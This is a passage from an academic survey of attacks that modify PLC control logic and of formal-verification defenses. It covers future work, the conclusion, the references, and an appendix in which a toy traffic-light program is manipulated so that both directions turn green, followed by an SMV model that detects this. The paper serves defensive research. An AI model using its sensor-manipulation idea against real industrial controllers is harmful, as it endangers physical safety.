PLCv erif, nuXmv, Uppaal Darv as 16-2 [29] GI1 SR MC, EC temporal logic LD,FBD PLCv erif, NuSMV , nuXmv, etc. Darv as 17 [30] GI1 BM N/A temporal logic IL PLCv erif, Xtext parser Giese 06 [41] GI1 BM, SG EC N/A ST GROOVE, ISABELLE, FUJABA Gourcuf f 06 [42] GI1,GI3 SR MC N/A ST,LD,IL NuSMV Hailesellasie 18 [44] GI1,GC FV MC N/A SFC,ST ,IL BIP, nuXmv, Uppaal,UBIS model Huang 19 [47] GI1 SG N/A N/A ST Kframework, KST model Kim 17 [56] GI1,GI3 FV MC, EC CTL FBD,LD CASE tools (Nude 2.0), NuSCR Moon 94 [74] GI1 SG MC CTL LD N/A Newell 18 [76] GI1,GI3 BM, SR TP N/A FBD PVS Theorem prover Niang 17 [77] GI3 FV MC N/A generic Uppaal, program translators Pavlovic 10 [79] GI1,GI3 SR MC CTL FBD NuSMV Rawlings 18 [81] GI1 SG, FV MC CTL, ACTL ST st2smv , SynthSMV* Mader 00 [66] GI1 BM N/A N/A generic N/A Ovatman 16 [78] GI1,GI3 BM, FV MC N/A generic N/A Moon 92 [75] GI1,GI3 ALL MC CTL LD aCTL model checker Bohlender 18 [14] GI1,GI3 SR MC N/A ST Z3,PLCOpen, Arcade.PLC Kuzmin 13 [61] GI1 BM N/A LTL ST Cadence SMV Bonfe 03 [15] GI3 BM N/A CTL generic SMV , CASE tools Chadwick 18 [20] GI3 BM, SG TP FOL LD Swansea Frey 00 [35] GI1,GI3 BM N/A N/A N/A N/A Yoo 09 [96] GI3 ALL MC, EC CTL FBD NuSCR, Cadence SMV , VIS, CASE Lamperiere 99 [62] GI1 BM N/A N/A generic N/A Kottler 17 [59] GI3 ALL N/A CTL LD NuSMV Younis 03 [97] GI1,GI3 BM N/A N/A generic N/A Rossi 00 [82] GI1 BM MC CTL, LTL LD Cadence SMV Vyatkin 99 [89] GI1 BM MC CTL FBD SESA model-analyserT1sourcecode Canet 00 [17] GI1,GI3 ALL MC LTL IL Cadence SMV Chang 18 [21] GI1 ALL MC LTL, CTL IL DotNetSiemensPLCT oolBoxLibrary McLaughlin 14 [71] GI1,GI3 ALL MC LTL IL TSV, Z3, NuSMV Xie 20 [93] GI1,GC,GA BM, SG, FV MC LTL IL SMT , NuXMVT2bytecode/binary Zonouz 14 [100] GI1,GI3 BM, SG, FV MC LTL IL Z3,NuSMV Carlsson 12 [18] GI FV MC CTL, LTL N/A NuSMV Cengic 06 [19] GI2 BM MC CTL FBD Supremica Galv ao 18 [36] GI3,GI4 SG MC CTL FBD ViVe/SESA Garcia 16 [40] GI3 FV MC DFA LD,ST N/A Janick e 15 [53] GI1,GI2 BM, SR MC ITL LD Tempura Luccarini 10 [65] GI3,GI4 BM, SR, SG TP CLIMB N/A SCIFF checker Mesli 16 [72] GI BM, SG, FV MC TCTL LD,FBD Uppaal Wang 13 [91] GI1,GI2 BM, SR, SG MC LTL, MTL IL BIP Zhang 19 [98] GI,GC ALL MC TPTL ST BUILDTSEQS algorithm Zhou 09 [99] GI BM, SR MC TCTL IL Uppaal Wan 09 [90] GI1,GI2 BM, FV TP Gallina LD Coq, Vernacular Garcia 19 [38] GI BM TP differential dL ST KeYmaera X Mokadem 10 [73] GI3 BM MC TCTL LD Uppaal Cheng 17 [23] GI2,GC BM N/A eFSA N/A LLVM DGT3runtime Ait 98 [5] GI2 SG TP FOL N/A Atelier B Defense F ocus: Behavior modeling (BM), State Reduction (SR), Speci cation Generation (SG), and F ormal V eri cation (FV). V eri cationtehcniques: model checking (MC), equivalence checking (EC), and theorem proving (TP). In tools: items in bold are self-developed, bold italics are open-source and *represent tools no longer mantained. de ned properties can cause implicitness. We recommend future research to consider domain-speci c properties asahybrid program consisted of continuous plant models aswell as discrete control algorithms. These properties canbe formalized using differential dynamic logic and veri edwith a sound proof calculus. Existing research [38] has 397 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. formalized the dynamic logic model of a water treatment testbed controlled by a ST program. The formalizationaims to understand safety implications, and can onlysupport one task with boolean operations. Future researchshould explore the formalization of dynamic logic withthe goal of security veri cation, and support arithmeticoperations, multitask programs, and applications in otherdomains. 6.3.2. Incremental speci cation generation. We dis- cussed attacks using expanded input surfaces or a full chain of vulnerabilities in Section 4.2. We also discussed the challenges given the fast-evolving system design inSection 5.3.4. This leads us to think about incremental speci cation generation, with a full chain of behaviors,and update in a dynamic spectrum. Incremental speci -cation generation [5] has been designed for interactivesystems. In the PLC chain of control, interactions shouldconsider both the physical process changes, and the in-clusion of the engineering station. Modeled behaviorsfrom these new interactions should be compatible withexisting properties. To update in a dynamic spectrum, thebehavior changes from each interactive component shouldsupport automatic generation and comparison. This re-quires automatic translations between the behavior modelsof each component. The closest study is HyPLC [ 38], which supported automatic translation between the PLCprogram, and the physical plant model. However, incre-mental speci cation generation was not considered. Weencourage future research to investigate this direction, andseek interactive mutual re nement. 6.4. Veri cation 6.4.1. Real-time attack detection. As shown in Sections 5.4.3 and5.4.4, there is a high demand for runtime veri - cation beyond a high-level prototype. To perform runtimeveri cation, existing studies depend on engineering sta-tions. However, Section 4.1.3 has demonstrated runtime attacks aiming at evading or deceiving the engineering sta-tion from runtime detection. The engineering stations havebeen exposed to various vulnerabilities [1], [50], [51], dueto the rich features supported outside the scope of security.Therefore, we recommend future research to consider adedicated security component, such as the bump-in-the-wire solution provided by TSV [71]. This component ispromising in eliminating the resource constraints withina PLC, and allows the program to meet the strict cycletime. In addition to the real-time requirement, future re-search should also learn from existing attack studies [37],[54], and consider exploring the veri cation between thePLC and the other interacting components, including theengineering station. 6.4.2. Open-source tools and benchmarks. We dis- cussed in Section 5.4.4 that the lack of open-source tools and benchmarks have led to adhoc studies without evaluations on models and veri cation techniques. It ispromising to see PLCverif [26] become open-source andsupport integration of various model checking tools. Werecommend future studies to continue the developmentof open-source tools, to cover program modeling, statereduction, speci cation generation, and formal veri ca-tion. To adapt to broad use cases, we suggest the tools tobe IEC-61131 compliant, compatible with existing open-source PLC tools [7], and consider long time maintenance.We also recommend future studies to develop PLC se-curity benchmarks, including a collection of open-sourceprograms that are vendor-independent and can representindustrial complexities, and a set of security metrics thatcan support concrete evaluations. 6.4.3. Multitasks Veri cation. In Section 4.1.3,w eh a v e discussed attacks that can use PLC multitasks to perform a denial-of-service attacks, and spread stealthy worms. Todefend against multitask attacks, existing studies [39], [73]only considered checking the reaction time between tasksto detect failures of meeting the cycle time requirement.We recommend future research to consider more attackscenarios involved in multitask programs, for example,using one task to spy or spread malicious code to the otherco-located tasks, as did in PLCInject [58] and PLC-Blaster[85], or manipulating shared resources (e.g. global vari-ables) between tasks to produce non-deterministic outputto disturb the physical processes. Future research shouldexplore the veri cation of these attack scenarios, with theconsideration of task intervals and priorities at variousgranularities. 7. Conclusion This paper provided a systematization of knowl- edge based on control logic modi cation and formalveri cation-based defense. We categorized existing studiesbased on threat models, security goals, and underlyingweaknesses. We discussed the techniques and approachesapplied by these studies. Our systematization showed thatcontrol logic modi cation attacks have been evolved withthe system design. Advanced attacks could compromisethe whole chain of control, and in the meantime evadevarious security detection methods. We found that formalveri cation based defense studies focus more on integritythan con dentiality and availability. We also found thatthe majority of the research investigate ad-hoc formalveri cation techniques, and the barriers exist in everyaspect of formal veri cation. To overcome these barriers, we suggest a full chain of protection and we encourage future research to investigatethe following: (1) formalize plant behaviors to defendinput manipulation attacks, (2) explore stealthy attackdetection with state reduction techniques, (3) automatedomain-speci c speci cation generation and incrementalspeci cation generation, and (4) explore real-time veri ca-tion with more support in open-source tools and thoroughevaluation. Acknowledgment The authors would like to thank the anonymous re- viewers for their insightful comments. This project wassupported by the National Science Foundation (Grant#:CNS-1748334) and the Army Research Of ce (Grant#:W911NF-18-1-0093). Any opinions, ndings, and con-clusions or recommendations expressed in this paper are 398 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. those of the authors and do not necessarily re ect the views of the funding agencies or sponsors. References [1] Siemens SIMATIC PCS7, WinCC, TIA Portal (Update D). https: //www.us-cert.gov/ics/advisories/ICSA-19-134-08. [2] Simatic S5 PLC. https://en.wikipedia.org/wiki/Simatic S5PLC. [3] Ali Abbasi and Majid Hashemi. Ghost in the PLC designing an undetectable programmable logic controller rootkit via pin control attack. Black Hat Europe, 2016:1 35, 2016. [4] Borja Fernandez Adiego, D aniel Darvas, Enrique Blanco Vi nuela, Jean-Charles Tournier, Simon Bliudze, Jan Olaf Blech, and V ctor Manuel Gonz alez Su arez. Applying model checking to industrial- sized PLC programs. 11(6):1400 1410, 2015. [5] Yamine A t-Ameur, Patrick Girard, and Francis Jambon. Using the b formal approach for incremental speci cation design of in-teractive systems. In IFIP International Conference on Engineer- ing for Human-Computer Interaction, pages 91 109. Springer,1998. [6] Thiago Alves. PLC addressing. https://www.openplcproject.com/ reference/plc-addressing/. [7] Thiago Alves and Thomas Morris. Openplc: An iec 61,131 3 compliant open source industrial controller for cyber securityresearch. Computers & Security, 78:364 379, 2018. [8] Michael J Assante. Con rmation of a coordinated attack on the ukrainian power grid. SANS Industrial Control Systems Security Blog, 207, 2016. [9] Nanette Bauer, Sebastian Engell, Ralf Huuck, Sven Lohmann, Ben Lukoschus, Manuel Remelhe, and Olaf Stursberg. Veri -cation of PLC programs given as sequential function charts. InIntegration of software speci cation techniques for applicationsin Engineering, pages 517 540. Springer, 2004. [10] Darlam Fabio Bender, Beno t Combemale, Xavier Cr egut, Jean Marie Farines, Bernard Berthomieu, and Franc ois Vernadat.Ladder metamodeling and PLC program validation through timePetri nets. In European Conference on Model Driven Architecture- F oundations and Applications, pages 121 136. Springer, 2008. [11] Dillon Beresford. Exploiting siemens simatic s7 plcs. Black Hat USA, 16(2):723 733, 2011. [12] Sebastian Biallas, J org Brauer, and Stefan Kowalewski. Arcade. PLC: A veri cation platform for programmable logic controllers.In2012 Proceedings of the 27th IEEE/ACM International Confer- ence on Automated Software Engineering, pages 338 341. IEEE,2012. [13] Sidi Ould Biha. A formal semantics of PLC programs in Coq. In2011 IEEE 35th Annual Computer Software and Applications Conference, pages 118 127. IEEE, 2011. [14] Dimitri Bohlender and Stefan Kowalewski. Compositional veri - cation of PLC software using horn clauses and mode abstraction.IF AC-PapersOnLine, 51(7):428 433, 2018. [15] Marcello Bonfe and Cesare Fantuzzi. Design and veri cation of mechatronic object-oriented models for industrial control systems.InEFTA 2003. 2003 IEEE Conference on Emerging Technologies and Factory Automation. Proceedings (Cat. No. 03TH8696) , vol- ume 2, pages 253 260. IEEE, 2003. [16] Ed Brinksma and Angelika Mader. Veri cation and optimization of a PLC control schedule. In International SPIN Workshop on Model Checking of Software, pages 73 92. Springer, 2000. [17] G eraud Canet, Sandrine Couf n, J-J Lesage, Antoine Petit, and Philippe Schnoebelen. Towards the automatic veri cation of PLCprograms written in Instruction List. volume 4, pages 2449 2454.IEEE, 2000. [18] Henrik Carlsson, Bo Svensson, Fredrik Danielsson, and Bengt Lennartson. Methods for reliable simulation-based PLC code ver-i cation. IEEE Transactions on Industrial Informatics, 8(2):267 278, 2012.[19] Goran Cengic, Oscar Ljungkrantz, and Knut Akesson. Formal modeling of function block applications running in IEC 61499execution runtime. In 2006 IEEE Conference on Emerging Technologies and Factory Automation, pages 1269 1276. IEEE,2006. [20] Simon Chadwick, Phillip James, Markus Roggenbach, and Tom Wetner. Formal Methods for Industrial Interlocking Veri cation.In2018 International Conference on Intelligent Rail Transporta- tion (ICIRT), pages 1 5. IEEE, 2018. [21] Tianyou Chang, Qiang Wei, Wenwen Liu, and Yangyang Geng. Detecting plc program malicious behaviors based on state veri- cation. volume 11067 of Lecture Notes in Computer Science, pages 241 255, Cham, 2018. Springer International Publishing. [22] Eyasu Getahun Chekole, Sudipta Chattopadhyay, Mart n Ochoa, Huaqun Guo, and Unnikrishnan Cheramangalath. Cima:Compiler-enforced resilience against memory safety attacks incyber-physical systems. Computers & Security, page 101832, 2020. [23] Long Cheng, Ke Tian, and Danfeng Yao. Orpheus: Enforc- ing cyber-physical execution semantics to defend against data-oriented attacks. In Proceedings of the 33rd Annual Computer Security Applications Conference, pages 315 326, 2017. [24] Stephen Chong, Joshua Guttman, Anupam Datta, Andrew Myers, Benjamin Pierce, Patrick Schaumont, Tim Sherwood, and Nick-olai Zeldovich. Report on the NSF workshop on formal methodsfor security. arXiv preprint arXiv:1608.00678, 2016. [25] D aniel Darvas, Borja Fern andez Adiego, Andr as V or os, Tam as Bartha, Enrique Blanco Vinuela, and V ctor M Gonz alez Su arez. Formal veri cation of complex properties on PLC programs. InInternational Conference on F ormal Techniques for DistributedObjects, Components, and Systems, pages 284 299. Springer,2014. [26] D aniel Darvas, Enrique Blanco, and Switzerland V Moln ar. PLCverif Re-engineered: An Open Platform for the Formal Anal-ysis of PLC Programs. ICALEPCS. [27] D aniel Darvas, Enrique Blanco Vinuela, and Istv an Majzik. A formal speci cation method for PLC-based applications. 2015. [28] D aniel Darvas, Istv an Majzik, and Enrique Blanco Vi nuela. Generic representation of PLC programming languages for formalveri cation. In Proc. of the 23rd PhD Mini-Symposium, pages 6 9. [29] D aniel Darvas, Istv an Majzik, and Enrique Blanco Vi nuela. For- mal veri cation of safety PLC based control software. In Interna- tional Conference on Integrated F ormal Methods , pages 508 522. Springer, 2016. [30] D aniel Darvas, Istv an Majzik, and Enrique Blanco Vi nuela. PLC program translation for veri cation purposes. Periodica Polytech- nica Electrical Engineering and Computer Science, 61(2):151 165, 2017. [31] Alessandro Di Pinto, Younes Dragoni, and Andrea Carcano. Tri- ton: The rst ics cyber attack on safety instrument systems. InProc. Black Hat USA, pages 1 26, 2018. [32] Rolf Drechsler et al. Advanced formal veri cation, volume 122. Springer, 2004. [33] Nicolas Falliere, Liam O Murchu, and Eric Chien. W32. stuxnet dossier. White paper , Symantec Corp., Security Response , 5(6):29, 2011. [34] Alessio Ferrari, Gianluca Magnani, Daniele Grasso, and Alessan- dro Fantechi. Model checking interlocking control tables. InFORMS/FORMAT 2010, pages 107 115. Springer, 2011. [35] Georg Frey and Lothar Litz. Formal methods in PLC program- ming. In Smc 2000 conference proceedings. 2000 ieee interna- tional conference on systems, man and cybernetics. cyberneticsevolving to systems, humans, organizations, and their complexinteractions (cat. no. 0, volume 4, pages 2431 2436. IEEE, 2000. [36] Joel Galv ao, Cedrico Oliveira, Helena Lopes, and Laura Tiainen. Formal veri cation: Focused on the veri cation using a plantmodel. In International Conference on Innovation, Engineering and Entrepreneurship, pages 124 131. Springer, 2018. 399 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. [37] Luis Garcia, Ferdinand Brasser, Mehmet Hazar Cintuglu, Ahmad- Reza Sadeghi, Osama A Mohammed, and Saman A Zonouz. Hey, My Malware Knows Physics! Attacking PLCs with PhysicalModel Aware Rootkit. In NDSS, 2017. [38] Luis Garcia, Stefan Mitsch, and Andr e Platzer. HyPLC: Hybrid programmable logic controller program translation for veri ca-tion. In Proceedings of the 10th ACM/IEEE International Con- ference on Cyber-Physical Systems, pages 47 56, 2019. [39] Luis Garcia, Stefan Mitsch, and Andr e Platzer. Toward multi- task support and security analyses in plc program translation forveri cation. In Proceedings of the 10th ACM/IEEE International Conference on Cyber-Physical Systems, pages 348 349, 2019. [40] Luis Garcia, Saman Zonouz, Dong Wei, and Leandro P eger De Aguiar. Detecting PLC control corruption via on-deviceruntime veri cation. In 2016 Resilience Week (RWS), pages 67 72. IEEE, 2016. [41] Holger Giese, Sabine Glesner, Johannes Leitner, Wilhelm Sch afer, and Robert Wagner. Towards veri ed model transformations. InProc. of the 3rd International Workshop on Model Development,V alidation and V eri cation (MoDeV 2a), Genova, Italy, pages 78 93. Citeseer, 2006. [42] Vincent Gourcuff, Olivier De Smet, and J-M Faure. Ef cient representation for formal veri cation of PLC programs. In 2006 8th International Workshop on Discrete Event Systems, pages182 187. IEEE, 2006. [43] Naman Govil, Anand Agrawal, and Nils Ole Tippenhauer. On ladder logic bombs in industrial control systems. In Computer Security, pages 110 126. Springer, 2017. [44] Muluken Hailesellasie and Syed Rafay Hasan. Intrusion Detection in PLC-Based Industrial Control Systems Using Formal Veri ca-tion Approach in Conjunction with Graphs. Journal of Hardware and Systems Security, 2(1):1 14, 2018. [45] Joseph Y Halpern and Moshe Y Vardi. Model checking vs. theo- rem proving: a manifesto. Arti cial intelligence and mathematical theory of computation, 212:151 176, 1991. [46] Daavid Hentunen and Antti Tikkanen. Havex hunts for ics/scada systems. In F-Secure. 2014. [47] Yanhong Huang, Xiangxing Bu, Gang Zhu, Xin Ye, Xiaoran Zhu, and Jianqi Shi. KST: Executable Formal Semantics of IEC 61131-3 Structured Text for Veri cation. IEEE Access, 7:14593 14602, 2019. [48] ICS-CERT. CVE-2017-12088. https://nvd.nist.gov/vuln/detail/ CVE-2017-12088. [49] ICS-CERT. CVE-2017-12739. https://nvd.nist.gov/vuln/detail/ CVE-2017-12739. [50] ICS-CERT. CVE-2017-13997. https://nvd.nist.gov/vuln/detail/ CVE-2017-13997. [51] ICS-CERT. CVE-2018-10619. https://nvd.nist.gov/vuln/detail/ CVE-2018-10619. [52] ICS-CERT. CVE-2019-10922. https://nvd.nist.gov/vuln/detail/ CVE-2019-10922. [53] Helge Janicke, Andrew Nicholson, Stuart Webber, and Antonio Cau. Runtime-monitoring for industrial control systems. Elec- tronics, 4(4):995 1017, 2015. [54] Sushma Kalle, Nehal Ameen, Hyunguk Yoo, and Irfan Ahmed. CLIK on PLCs! Attacking control logic with decompilation andvirtual PLC. In Binary Analysis Research (BAR) Workshop, Network and Distributed System Security Symposium (NDSS),2019. [55] Anastasis Keliris and Michail Maniatakos. ICSREF: A framework for automated reverse engineering of industrial control systemsbinaries. In 26th Annual Network and Distributed System Security Symposium, NDSS 2019. The Internet Society, 2019. [56] Eui-Sub Kim, Dong-Ah Lee, Sejin Jung, Junbeom Yoo, Jong- Gyun Choi, and Jang-Soo Lee. NuDE 2.0: A Formal Method-based Software Development, Veri cation and Safety AnalysisEnvironment for Digital I&Cs in NPPs. Journal of Computing Science and Engineering, 11(1):9 23, 2017.[57] St ephane Klein, Lothar Litz, and Jean-Jacques Lesage. Fault de- tection of discrete event systems using an identi cation approach.IF AC Proceedings V olumes, 38(1):92 97, 2005. [58] Johannes Klick, Stephan Lau, Daniel Marzin, Jan-Ole Malchow, and V olker Roth. Internet-facing PLCs-a new back ori ce. Black- hat USA, pages 22 26, 2015. [59] Sam Kottler, Mehdy Khayamy, Syed Rafay Hasan, and Omar Elkeelany. Formal veri cation of ladder logic programs usingNuSMV. InSoutheastCon 2017, pages 1 5. IEEE, 2017. [60] Jochen K uhner. Dotnetsiemensplctoolboxlibrary. https://github.com/jogibear9988/DotNetSiemensPLCToolBoxLibrary. [61] Egor Vladimirovich Kuzmin, AA Shipov, and Dmitrii Aleksan- drovich Ryabukhin. Construction and veri cation of PLC pro-grams by LTL speci cation. In 2013 Tools & Methods of Program Analysis, pages 15 22. IEEE, 2013. [62] Sandrine Lamp eri`ere-Couf n, Olivier Rossi, J-M Roussel, and J-J Lesage. Formal validation of PLC programs: a survey. In 1999 European Control Conference (ECC), pages 2170 2175. IEEE,1999. [63] Robert M Lee, Michael J Assante, and Tim Conway. German steel mill cyber attack. Industrial Control Systems, 30:62, 2014. [64] Bernard Lim, Daniel Chen, Yongkyu An, Zbigniew Kalbarczyk, and Ravishankar Iyer. Attack induced common-mode failureson plc-based safety system in a nuclear power plant: Practicalexperience report. In 2017 IEEE 22nd Paci c Rim International Symposium on Dependable Computing (PRDC), pages 205 210.IEEE, 2017. [65] Luca Luccarini, Gianni Luigi Bragadin, Gabriele Colombini, Maurizio Mancini, Paola Mello, Marco Montali, and DavideSottara. Formal veri cation of wastewater treatment processesusing events detected from continuous signals by means of ar-ti cial neural networks. Case study: SBR plant. Environmental Modelling & Software, 25(5):648 660, 2010. [66] Angelika Mader. A classi cation of PLC models and applications. InDiscrete Event Systems, pages 239 246. Springer, 2000. [67] PLC Manual. Basic Guide to PLCs: PLC Programming. https: //www.plcmanual.com/plc-programming. [68] Stephen McLaughlin and Patrick McDaniel. SABOT: speci cation-based payload generation for programmable logiccontrollers. In Proceedings of the 2012 ACM conference on Computer and communications security, pages 439 449, 2012. [69] Stephen McLaughlin and Saman Zonouz. Controller-aware false data injection against programmable logic controllers. In 2014 IEEE International Conference on Smart Grid Communications(SmartGridComm), pages 848 853. IEEE, 2014. [70] Stephen E McLaughlin. On Dynamic Malware Payloads Aimed at Programmable Logic Controllers. In HotSec, 2011. [71] Stephen E McLaughlin, Saman A Zonouz, Devin J Pohly, and Patrick D McDaniel. A Trusted Safety Veri er for ProcessController Code. In NDSS, volume 14, 2014. [72] S Mesli-Kesraoui, A Toguyeni, A Bignon, F Oquendo, D Kesraoui, and P Berruet. Formal and joint veri cation of controlprograms and supervision interfaces for socio-technical systemscomponents. IF AC-PapersOnLine, 49(19):426 431, 2016. [73] Houda Bel Mokadem, B eatrice Berard, Vincent Gourcuff, Olivier De Smet, and Jean-Marc Roussel. Veri cation of a timed mul-titask system with UPPAAL. IEEE Transactions on Automation Science and Engineering, 7(4):921 932, 2010. [74] Il Moon. Modeling programmable logic controllers for logic veri cation. IEEE Control Systems Magazine, 14(2):53 59, 1994. [75] Il Moon, Gary J Powers, Jerry R Burch, and Edmund M Clarke. Automatic veri cation of sequential control systems using tem-poral logic. AIChE Journal, 38(1):67 75, 1992. [76] Josh Newell, Linna Pang, David Tremaine, Alan Wassyng, and Mark Lawford. Translation of IEC 61131-3 function blockdiagrams to PVS for formal veri cation with real-time nuclearapplication. Journal of Automated Reasoning, 60(1):63 84, 2018. 400 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. [77] Mohamed Niang, Alexandre Philippot, Franc ois Gellot, Rapha el Coupat, Bernard Riera, and S ebastien Lefebvre. Formal Veri - cation for Validation of PSEEL s PLC Program. In ICINCO (1), pages 567 574, 2017. [78] Tolga Ovatman, Atakan Aral, Davut Polat, and Ali Osman Unver. An overview of model checking practices on veri cation of PLC software. Software & Systems Modeling, 15(4):937 960, 2016. [79] Olivera Pavlovic and Hans-Dieter Ehrich. Model checking PLC software written in function block diagram. In 2010 Third International Conference on Software Testing, V eri cation andV alidation, pages 439 448. IEEE, 2010. [80] Mathias Rausch and Bruce H Krogh. Formal veri cation of PLC programs. In Proceedings of the 1998 American Control Conference. ACC (IEEE Cat. No. 98CH36207) , volume 1, pages 234 238. IEEE, 1998. [81] Blake C Rawlings, John M Wassick, and B Erik Ydstie. Applica- tion of formal veri cation and falsi cation to large-scale chemicalplant automation systems. Computers & Chemical Engineering , 114:211 220, 2018. [82] Olivier Rossi and Philippe Schnoebelen. Formal modeling of timed function blocks for the automatic veri cation of LadderDiagram programs. In Proceedings of the 4th International Conference on Automation of Mixed Processes: Hybrid DynamicSystems (ADPM 2000), pages 177 182. Citeseer, 2000. [83] Saranyan Senthivel, Shrey Dhungana, Hyunguk Yoo, Irfan Ahmed, and Vassil Roussev. Denial of engineering operationsattacks in industrial control systems. In Proceedings of the Eighth ACM Conference on Data and Application Security and Privacy,pages 319 329, 2018. [84] Abraham Serhane, Mohamad Raad, Raad Raad, and Willy Susilo. PLC code-level vulnerabilities. In 2018 International Conference on Computer and Applications (ICCA), pages 348 352. IEEE,2018. [85] Ralf Spenneberg, Maik Br uggemann, and Hendrik Schwartke. Plc-Blaster: A worm living solely in the plc. Black Hat Asia, Marina Bay Sands, Singapore, 2016. [86] Ruimin Sun. PLC-control-logic-CVE. https://github.com/ gracesrm/PLC-control-logic-CVE/blob/master/README.md. [87] Michael Tiegelkamp and Karl-Heinz John. IEC 61131-3: Pro- gramming industrial automation systems. Springer, 1995. [88] Sidney E Valentine Jr. Plc code vulnerabilities through scada systems. 2013. [89] Valeriy Vyatkin and H-M Hanisch. A modeling approach for veri cation of IEC1499 function blocks using net condition/eventsystems. In 1999 7th IEEE International Conference on Emerg- ing Technologies and Factory Automation. Proceedings ETF A 99(Cat. No. 99TH8467), volume 1, pages 261 270. IEEE, 1999. [90] Hai Wan, Gang Chen, Xiaoyu Song, and Ming Gu. Formalization and veri cation of PLC timers in Coq. In 2009 33rd Annual IEEE International Computer Software and Applications Conference,volume 1, pages 315 323. IEEE, 2009. [91] Rui Wang, Yong Guan, Liming Luo, Xiaoyu Song, and Jie Zhang. Formal modelling of PLC systems by BIP components. In2013 IEEE 37th Annual Computer Software and ApplicationsConference, pages 512 518. IEEE, 2013. [92] Min Xiao, Jing Wu, Chengnian Long, and Shaoyuan Li. Construc- tion of false sequence attack against PLC based power controlsystem. In 2016 35th Chinese Control Conference (CCC), pages 10090 10095. IEEE, 2016. [93] Yaobin Xie, Rui Chang, and Liehui Jiang. A malware detection method using satis ability modulo theory model checking forthe programmable logic controller system. Concurrency and Computation: Practice and Experience, n/a(n/a):e5724. [94] Hyunguk Yoo and Irfan Ahmed. Control logic injection attacks on industrial control systems. In IFIP International Conference on ICT Systems Security and Privacy Protection , pages 33 48. Springer, 2019.[95] Hyunguk Yoo, Sushma Kalle, Jared Smith, and Irfan Ahmed. Overshadow plc to detect remote control-logic injection attacks.InInternational Conference on Detection of Intrusions and Mal- ware, and Vulnerability Assessment, pages 109 132. Springer,2019. [96] Junbeom Yoo, Eunkyoung Jee, and Sungdeok Cha. Formal mod- eling and veri cation of safety-critical software. IEEE software, 26(3):42 49, 2009. [97] M Bani Younis, Georg Frey, et al. Formalization of existing PLC programs: A survey. In Proceedings of CESA, pages 0234 0239, 2003. [98] Mu Zhang, Chien-Ying Chen, Bin-Chou Kao, Yassine Qamsane, Yuru Shao, Yikai Lin, Elaine Shi, Sibin Mohan, Kira Barton,James Moyne, et al. Towards Automated Safety Vetting of PLCCode in Real-World Plants. In 2019 IEEE Symposium on Security and Privacy (SP), pages 522 538. IEEE, 2019. [99] Min Zhou, Fei He, Ming Gu, and Xiaoyu Song. Translation-based model checking for PLC programs. In 2009 33rd Annual IEEE International Computer Software and Applications Conference,volume 1, pages 553 562. IEEE, 2009. [100] Saman Zonouz, Julian Rrushi, and Stephen McLaughlin. De- tecting industrial control malware using automated PLC codeanalytics. IEEE Security & Privacy, 12(6):40 47, 2014. Appendix 1. Extended Background This section offers an example of an ST program controlling the traf c lights in a road intersection. We demonstrate an input manipulation attack and the processof using formal veri cation to detect and prevent it. 1.1. An ST code Example. Code 1 shows a simpli ed traf c light program written in ST. The program controls the light status (e.g. green, yellow, red) at an intersectionbetween two roads in the north-south (NS) direction andthe east-west (EW) direction. The program takes inputfrom sensors telling if emergency vehicles are approaching(line 4), and whether pedestrians press the button to re- quest crossing the intersection (line 5). In Figure A.1, lines 8to11de ne the output variables representing the status of lights at the NS and the EW directions. By default, thelight status in the NS direction is green, and the light statusin the EW direction is red. Then, lines 13to23de ne the logic of changing light status based on the values of theinput variables. 1TYPE Light : (Green, Yellow, Red); END_TYPE; 2PROGRAM TrafficLight 3VAR_INPUT 4 SensorNS : BOOL; SensorEW : BOOL; 5 ButtonNS : BOOL; ButtonEW : BOOL; 6END_VAR 7 8VAR_OUTPUT 9 LightNS : Light := Green; 10 LightEW : Light := Red; 11 END_VAR 1213 IFLightNS = RED AND LightEW = RED AND NOT(ButtonNS) AND NOT(SensorEW) THEN 14 (*turn green when light is red, button is reset, and no emergency detected *) 15 LightNS := Green; 16 ELSIF LightNS = GREEN AND LightEW = RED AND SensorEW THEN 17 (*light must change when emergency approaches in EW direction *) 18 LightNS := Yellow; 19 ELSIF LightNS = GREEN THEN 20 LightNS := Green; 401 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. 21 ELSE THEN 22 LightNS := Red; 23 END_IF; 24 25 (*The EW light status changes in a similar way *) 26 (*Omitted *) 27END_PROGRAM Code 1: A traf c light program in ST. 1.2. An attack Example. Normally, when the NS light is red, and an emergency vehicle is sensed in the NS direc- tion, the sensor will be on until the NS light is switched togreen. However, an attacker can manipulate the emergencysensor by switching it to on (e.g. SensorNS :=TRUE ) when the NS light is red and the EW light is green, andswitching it to off (e.g. SensorNS :=FA L SE ) when the NS light is red and the EW light is yellow. This can cause thegreen lights of both the NS direction and the EW directionto be on simultaneously. 1.3. Formal Veri cation. Next, we show how formal veri cation can catch the above-mentioned input manipu- lation attack. We rst model the ST program using the SMV lan- guage. This can be manually written or automaticallygenerated through open-source tools, such as st2smv.A s Code 2 shows, input variables are de ned as IV AR in lines 2to6. Other variables are de ned as VA R in lines 7to9, and initialized in ASSIGN using the initfunction in lines 10to12. Lines 14to25de ne the transition of light status, representing the program logic in Figure A.1from lines 13to26. We then specify the property that the green lights of the NS direction and the EW direction will never be onsimultaneously. This is achieved in line 28in which A denotes always and Gdenotes global . 1MODULE main 2 IVAR 3 button_NS: boolean; 4 button_EW: boolean; 5 sensor_NS: boolean; 6 sensor_EW: boolean; 7 VAR 8 light_NS: {RED, YELLOW, GREEN}; 9 light_EW: {RED, YELLOW, GREEN}; 10 ASSIGN 11 init(light_NS) := GREEN; 12 init(light_EW) := RED; 13 14 next(light_NS) := case 15 light_NS = RED & light_EW = RED & button_NS = FALSE & sensor_EW = FALSE: GREEN; 16 light_NS = GREEN & light_EW = RED & sensor_EW =TRUE: YELLOW; 17 light_NS = GREEN: GREEN; 18 TRUE: {RED}; 19 esac; 2021 next(light_EW) := case 22 light_EW = RED & light_NS = RED & button_EW = FALSE & sensor_NS= FALSE: GREEN; 23 light_EW = GREEN & light_NS = RED & sensor_NS =TRUE: YELLOW; 24 light_EW = 